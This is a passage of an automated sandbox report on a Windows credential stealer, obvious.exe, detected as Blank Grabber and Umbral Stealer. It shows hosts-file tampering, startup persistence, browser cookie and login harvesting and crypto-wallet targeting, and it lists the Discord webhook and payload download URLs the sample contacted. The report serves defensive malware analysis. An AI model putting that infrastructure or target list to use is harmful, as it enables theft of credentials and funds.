                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\obvious.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\obvious.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: obvious.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: obvious.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\obvious.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: obvious.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: obvious.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        File and Directory Permissions Modification                        		1
                        OS Credential Dumping                        		22
                        System Information Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Command and Scripting Interpreter                        		12
                        Registry Run Keys / Startup Folder                        		11
                        Process Injection                        		21
                        Disable or Modify Tools                        		LSASS Memory1
                        Query Registry                        		Remote Desktop Protocol2
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		Logon Script (Windows)12
                        Registry Run Keys / Startup Folder                        		11
                        Obfuscated Files or Information                        		Security Account Manager211
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Timestomp                        		NTDS1
                        Process Discovery                        		Distributed Component Object ModelInput Capture14
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets41
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading                        		DCSync11
                        Remote System Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion                        		Proc Filesystem11
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500039 Sample: obvious.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 48 ip-api.com 2->48 50 discord.com 2->50 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 15 other signatures 2->62 8 obvious.exe 15 15 2->8         started        signatures3 process4 dnsIp5 52 ip-api.com 208.95.112.1, 49731, 49738, 80 TUT-ASUS United States 8->52 54 discord.com 162.159.136.232, 443, 49740, 49741 CLOUDFLARENETUS United States 8->54 40 C:\ProgramData\Microsoft\...\uGCIY.scr, PE32 8->40 dropped 42 C:\Windows\System32\drivers\etc\hosts, ASCII 8->42 dropped 44 C:\Users\user\AppData\...\obvious.exe.log, ASCII 8->44 dropped 46 C:\ProgramData\...\uGCIY.scr:Zone.Identifier, ASCII 8->46 dropped 64 Suspicious powershell command line found 8->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 8->66 68 Self deletion via cmd or bat file 8->68 70 7 other signatures 8->70 13 powershell.exe 23 8->13         started        16 cmd.exe 8->16         started        18 powershell.exe 11 8->18         started        20 9 other processes 8->20 file6 signatures7 process8 signatures9 72 Loading BitLocker PowerShell Module 13->72 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        74 Uses ping.exe to check the status of other devices and networks 16->74 26 conhost.exe 16->26         started        28 PING.EXE 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        38 6 other processes 20->38 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        obvious.exe79%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        obvious.exe100%AviraHEUR/AGEN.1307507
                        obvious.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr100%AviraHEUR/AGEN.1307507
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr100%Joe Sandbox ML
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr79%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        http://ip-api.com0%URL Reputationsafe
                        https://oneget.orgX0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        https://docs.google.com/presentation/J0%Avira URL Cloudsafe
                        https://mail.google.com/mail/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                        https://drive.google.com/drive/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        https://mail.google.com/mail/?usp=installed_webapp0%Avira URL Cloudsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://media.discordapp.net/attachments/1176050474064019486/12780529320964Pj0%Avira URL Cloudsafe
                        https://docs.google.com/document/J0%Avira URL Cloudsafe
                        https://www.youtube.com/:0%Avira URL Cloudsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://discordapp.com/api/v9/users/0%Avira URL Cloudsafe
                        http://discord.com0%Avira URL Cloudsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        https://oneget.org0%URL Reputationsafe
                        https://mail.google.com/mail/:0%Avira URL Cloudsafe
                        http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                        https://docs.google.com/document/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                        https://docs.google.com/presentation/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                        https://docs.google.com/presentation/:0%Avira URL Cloudsafe
                        https://docs.google.com/spreadsheets/J0%Avira URL Cloudsafe
                        https://mail.google.com/mail/J0%Avira URL Cloudsafe
                        https://drive.google.com/?lfhs=20%Avira URL Cloudsafe
                        https://docs.google.com/document/:0%Avira URL Cloudsafe
                        https://docs.google.com/spreadsheets/?usp=installed_webapp0%Avira URL Cloudsafe
                        https://docs.google.com/spreadsheets/:0%Avira URL Cloudsafe
                        https://www.youtube.com/s/notifications/manifest/cr_install.html0%Avira URL Cloudsafe
                        https://www.youtube.com/?feature=ytca0%Avira URL Cloudsafe
                        https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX0%Avira URL Cloudsafe
                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-0%Avira URL Cloudsafe
                        https://www.youtube.com/J0%Avira URL Cloudsafe
                        http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                        https://discord.com0%Avira URL Cloudsafe
                        https://discord.com/api/v10/users/0%Avira URL Cloudsafe
                        https://drive.google.com/:0%Avira URL Cloudsafe
                        http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                        https://media.discordapp.net/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?e0%Avira URL Cloudsafe
                        https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex=0%Avira URL Cloudsafe
                        https://github.com/Pester/Pester0%Avira URL Cloudsafe
                        https://drive.google.com/J0%Avira URL Cloudsafe
                        https://docs.google.com/presentation/?usp=installed_webapp0%Avira URL Cloudsafe
                        https://github.com/Blank-c/Umbral-Stealer0%Avira URL Cloudsafe
                        https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                        https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ0%Avira URL Cloudsafe
                        https://media.discordapp.net/attachments/1176050474064019486/127805293209640%Avira URL Cloudsafe
                        http://ip-api.com/json/?fields=225545P0%Avira URL Cloudsafe
                        https://docs.google.com/document/?usp=installed_webapp0%Avira URL Cloudsafe
                        http://ip-api.com/json/?fields=2255450%Avira URL Cloudsafe
                        http://crl.micros0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        discord.com
                        		162.159.136.232
                        		truetrue
                          		unknown
                          ip-api.com
                          		208.95.112.1
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetXtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://mail.google.com/mail/?usp=installed_webappobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mail.google.com/mail/installwebapp?usp=chrome_defaultobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/presentation/Jobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/document/Jobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.google.com/drive/installwebapp?usp=chrome_defaultobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://discordapp.com/api/v9/users/obvious.exe, uGCIY.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.youtube.com/:obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://media.discordapp.net/attachments/1176050474064019486/12780529320964Pjobvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://discord.comobvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F616BA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mail.google.com/mail/:obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/document/installwebapp?usp=chrome_defaultobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/presentation/:obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/presentation/installwebapp?usp=chrome_defaultobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/document/:obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/spreadsheets/Jobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/spreadsheets/?usp=installed_webappobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mail.google.com/mail/Jobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
